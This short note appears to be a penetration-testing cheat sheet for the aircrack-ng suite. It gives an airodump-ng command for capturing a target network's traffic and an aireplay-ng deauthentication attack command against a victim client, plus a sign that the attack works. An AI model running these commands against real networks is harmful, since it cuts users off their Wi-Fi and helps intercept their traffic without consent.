Link to this headingAirCrack
Setup wireless Interfaces:
()
Dump Wifi Capture to file:
#airodump-ng -c <channel> --bssid <BSSID> -w wep1capture wlan0mon
Dauth Attack:
#aireplay-ng -0 -a <BSSID> -c <Victim> wlan0mon
You can tell that it is working when the Client in the airodump-ng window has 0 power.